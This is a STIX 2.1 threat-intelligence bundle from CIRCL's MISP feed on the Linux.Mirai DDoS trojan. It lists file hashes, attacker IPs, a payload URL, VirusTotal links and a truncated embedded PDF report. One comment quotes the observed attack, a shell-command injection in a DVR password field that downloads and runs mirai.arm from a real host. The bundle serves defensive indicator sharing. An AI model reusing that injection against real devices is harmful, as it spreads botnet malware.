adulau/misp-circl-feed
1
0
Fork 0
Code Issues 1 Pull requests Projects 1 Releases Packages Wiki Activity Actions
misp-circl-feed/feeds/circl/stix-2.1/57ef6d48-20c8-4e55-9f02-468f950d210f.json

530 lines
1.3 MiB
JSON
Raw Normal View History

chg: [misp-stix] STIX 2.1 export added
2023-04-21 14:44:17 +00:00
{
"type": "bundle",
"id": "bundle--57ef6d48-20c8-4e55-9f02-468f950d210f",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:12:49.000Z",
"modified": "2016-10-01T08:12:49.000Z",
"name": "CIRCL",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--57ef6d48-20c8-4e55-9f02-468f950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:12:49.000Z",
"modified": "2016-10-01T08:12:49.000Z",
"name": "OSINT - Investigation of Linux.Mirai Trojan family",
"published": "2016-10-01T08:13:16Z",
"object_refs": [
"x-misp-attribute--57ef6d8e-6630-40f3-976b-4234950d210f",
"observed-data--57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
"file--57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
"artifact--57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
"indicator--57ef6de3-827c-4967-9708-42ce950d210f",
"indicator--57ef6de3-f1b0-4776-9e5a-4add950d210f",
"indicator--57ef6de3-b284-456d-b74a-4b63950d210f",
"indicator--57ef6e99-0a20-4839-a902-4e4d950d210f",
"indicator--57ef6eec-c238-49ec-a6f8-4521950d210f",
"indicator--57ef6efb-b9fc-498a-a704-4f7f950d210f",
"indicator--57ef6f17-16f4-4e11-b0ce-4e91950d210f",
"x-misp-attribute--57ef6f37-5074-4e2b-85e6-4599950d210f",
"observed-data--57ef6f4f-8220-43c7-912c-4818950d210f",
"url--57ef6f4f-8220-43c7-912c-4818950d210f",
"indicator--57ef7002-6900-46c9-ac17-465d02de0b81",
"indicator--57ef7002-0194-4671-b962-44fa02de0b81",
"observed-data--57ef7002-0738-471a-8108-4e7502de0b81",
"url--57ef7002-0738-471a-8108-4e7502de0b81",
"indicator--57ef7002-2174-4783-bf9b-4e0a02de0b81",
"indicator--57ef7003-6fac-4d16-86e4-411502de0b81",
"observed-data--57ef7003-9390-423a-a424-4b2a02de0b81",
"url--57ef7003-9390-423a-a424-4b2a02de0b81",
"indicator--57ef7003-e8e4-4eee-b196-4b8e02de0b81",
"indicator--57ef7003-2388-4060-a02f-48c602de0b81",
"observed-data--57ef7003-07c0-4d57-a1d9-4a2d02de0b81",
"url--57ef7003-07c0-4d57-a1d9-4a2d02de0b81"
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"circl:incident-classification=\"malware\"",
"type:OSINT",
"ms-caro-malware:malware-type=\"DDoS\"",
"ms-caro-malware:malware-platform=\"Linux\"",
"misp-galaxy:tool=\"Mirai\""
]
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--57ef6d8e-6630-40f3-976b-4234950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:02:22.000Z",
"modified": "2016-10-01T08:02:22.000Z",
"labels": [
"misp:type=\"comment\"",
"misp:category=\"External analysis\""
],
"x_misp_category": "External analysis",
"x_misp_type": "comment",
"x_misp_value": "A Trojan for Linux that was named Linux.Mirai has several predecessors. The first malware program belonging to this family was spotted in May 2016 and was dubbed Linux.DDoS.87. At the beginning of August, a new version of this Trojan Linux.DDoS.89 was discovered. Finally, Doctor Web\u00e2\u20ac\u2122s security researchers investigated the \r\nLinux.Mirai Trojan found later that month."
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:03:12.000Z",
"modified": "2016-10-01T08:03:12.000Z",
"first_observed": "2016-10-01T08:03:12Z",
"last_observed": "2016-10-01T08:03:12Z",
"number_observed": 1,
"object_refs": [
"file--57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
"artifact--57ef6dc0-16dc-4e4e-980b-4ebb950d210f"
],
"labels": [
"misp:type=\"attachment\"",
"misp:category=\"External analysis\""
]
},
{
"type": "file",
"spec_version": "2.1",
"id": "file--57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
"name": "Investigation_of_Linux.Mirai_Trojan_family_en.pdf",
"content_ref": "artifact--57ef6dc0-16dc-4e4e-980b-4ebb950d210f"
},
{
"type": "artifact",
"spec_version": "2.1",
"id": "artifact--57ef6dc0-16dc-4e4e-980b-4ebb950d210f",
"payload_bin": "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
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--57ef6de3-827c-4967-9708-42ce950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:03:47.000Z",
"modified": "2016-10-01T08:03:47.000Z",
"description": "x86",
"pattern": "[file:hashes.SHA1 = 'c129e2a23abe826f808725a0724f12470502a3cc']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-10-01T08:03:47Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--57ef6de3-f1b0-4776-9e5a-4add950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:03:47.000Z",
"modified": "2016-10-01T08:03:47.000Z",
"description": "ARM",
"pattern": "[file:hashes.SHA1 = '8fd0d16edf270c453c5b6b2481d0a044a410c7cd']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-10-01T08:03:47Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--57ef6de3-b284-456d-b74a-4b63950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:03:47.000Z",
"modified": "2016-10-01T08:03:47.000Z",
"description": "ARM",
"pattern": "[file:hashes.SHA1 = '9ff383309ad63da2caa9580d7d85abeece9b13a0']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-10-01T08:03:47Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--57ef6e99-0a20-4839-a902-4e4d950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:06:49.000Z",
"modified": "2016-10-01T08:06:49.000Z",
"pattern": "[file:name = '.shinigami']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-10-01T08:06:49Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Artifacts dropped"
}
],
"labels": [
"misp:type=\"filename\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--57ef6eec-c238-49ec-a6f8-4521950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:08:12.000Z",
"modified": "2016-10-01T08:08:12.000Z",
"pattern": "[url:value = 'http://5.206.225.122/bins/mirai.arm']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-10-01T08:08:12Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--57ef6efb-b9fc-498a-a704-4f7f950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:08:27.000Z",
"modified": "2016-10-01T08:08:27.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '5.206.225.122']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-10-01T08:08:27Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--57ef6f17-16f4-4e11-b0ce-4e91950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:08:55.000Z",
"modified": "2016-10-01T08:08:55.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '151.80.99.84']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-10-01T08:08:55Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--57ef6f37-5074-4e2b-85e6-4599950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:09:27.000Z",
"modified": "2016-10-01T08:09:27.000Z",
"labels": [
"misp:type=\"comment\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Payload delivery",
"x_misp_comment": "The malware was installed on a dvr and was started with this bash injection in password field",
"x_misp_type": "comment",
"x_misp_value": "Password=;tftp -l /dev/dvrHelper -r mirai.arm -g 151.80.99.84 || wget http://5.206.225.122/bins/mirai.arm -O /dev/dvrHelper; chmod 777 /dev/dvrHelper; cd /dev; ./dvrHelper 2>&1;/bin/busybox MIRAI 2>&1;"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--57ef6f4f-8220-43c7-912c-4818950d210f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:09:51.000Z",
"modified": "2016-10-01T08:09:51.000Z",
"first_observed": "2016-10-01T08:09:51Z",
"last_observed": "2016-10-01T08:09:51Z",
"number_observed": 1,
"object_refs": [
"url--57ef6f4f-8220-43c7-912c-4818950d210f"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--57ef6f4f-8220-43c7-912c-4818950d210f",
"value": "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4477"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--57ef7002-6900-46c9-ac17-465d02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:12:50.000Z",
"modified": "2016-10-01T08:12:50.000Z",
"description": "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0",
"pattern": "[file:hashes.SHA256 = 'f8fcaa18be035d0448de7db6781c5e495b665bd3844119171714431a3c1aedbc']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-10-01T08:12:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--57ef7002-0194-4671-b962-44fa02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:12:50.000Z",
"modified": "2016-10-01T08:12:50.000Z",
"description": "ARM - Xchecked via VT: 9ff383309ad63da2caa9580d7d85abeece9b13a0",
"pattern": "[file:hashes.MD5 = '78440b86e34579001bea6ebc600751f5']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-10-01T08:12:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--57ef7002-0738-471a-8108-4e7502de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:12:50.000Z",
"modified": "2016-10-01T08:12:50.000Z",
"first_observed": "2016-10-01T08:12:50Z",
"last_observed": "2016-10-01T08:12:50Z",
"number_observed": 1,
"object_refs": [
"url--57ef7002-0738-471a-8108-4e7502de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--57ef7002-0738-471a-8108-4e7502de0b81",
"value": "https://www.virustotal.com/file/f8fcaa18be035d0448de7db6781c5e495b665bd3844119171714431a3c1aedbc/analysis/1465114448/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--57ef7002-2174-4783-bf9b-4e0a02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:12:50.000Z",
"modified": "2016-10-01T08:12:50.000Z",
"description": "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd",
"pattern": "[file:hashes.SHA256 = '7cf5d0188e43a9a46676d8e71dc251c0871b23eff9d66f89d7eabaeba7a3d2cc']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-10-01T08:12:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--57ef7003-6fac-4d16-86e4-411502de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:12:51.000Z",
"modified": "2016-10-01T08:12:51.000Z",
"description": "ARM - Xchecked via VT: 8fd0d16edf270c453c5b6b2481d0a044a410c7cd",
"pattern": "[file:hashes.MD5 = 'e64079b3ccf906204474beca1f5cc41d']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-10-01T08:12:51Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--57ef7003-9390-423a-a424-4b2a02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:12:51.000Z",
"modified": "2016-10-01T08:12:51.000Z",
"first_observed": "2016-10-01T08:12:51Z",
"last_observed": "2016-10-01T08:12:51Z",
"number_observed": 1,
"object_refs": [
"url--57ef7003-9390-423a-a424-4b2a02de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--57ef7003-9390-423a-a424-4b2a02de0b81",
"value": "https://www.virustotal.com/file/7cf5d0188e43a9a46676d8e71dc251c0871b23eff9d66f89d7eabaeba7a3d2cc/analysis/1464739147/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--57ef7003-e8e4-4eee-b196-4b8e02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:12:51.000Z",
"modified": "2016-10-01T08:12:51.000Z",
"description": "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc",
"pattern": "[file:hashes.SHA256 = '45b7fa5ad2eae5b32b15ccef313713a37481b6178c4c8bbbb524822a56883b56']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-10-01T08:12:51Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha256\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--57ef7003-2388-4060-a02f-48c602de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:12:51.000Z",
"modified": "2016-10-01T08:12:51.000Z",
"description": "x86 - Xchecked via VT: c129e2a23abe826f808725a0724f12470502a3cc",
"pattern": "[file:hashes.MD5 = '5d25f735cf059d6b4076947860da5c45']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-10-01T08:12:51Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--57ef7003-07c0-4d57-a1d9-4a2d02de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-10-01T08:12:51.000Z",
"modified": "2016-10-01T08:12:51.000Z",
"first_observed": "2016-10-01T08:12:51Z",
"last_observed": "2016-10-01T08:12:51Z",
"number_observed": 1,
"object_refs": [
"url--57ef7003-07c0-4d57-a1d9-4a2d02de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--57ef7003-07c0-4d57-a1d9-4a2d02de0b81",
"value": "https://www.virustotal.com/file/45b7fa5ad2eae5b32b15ccef313713a37481b6178c4c8bbbb524822a56883b56/analysis/1465114403/"
}
]
}
Reference in a new issue Copy permalink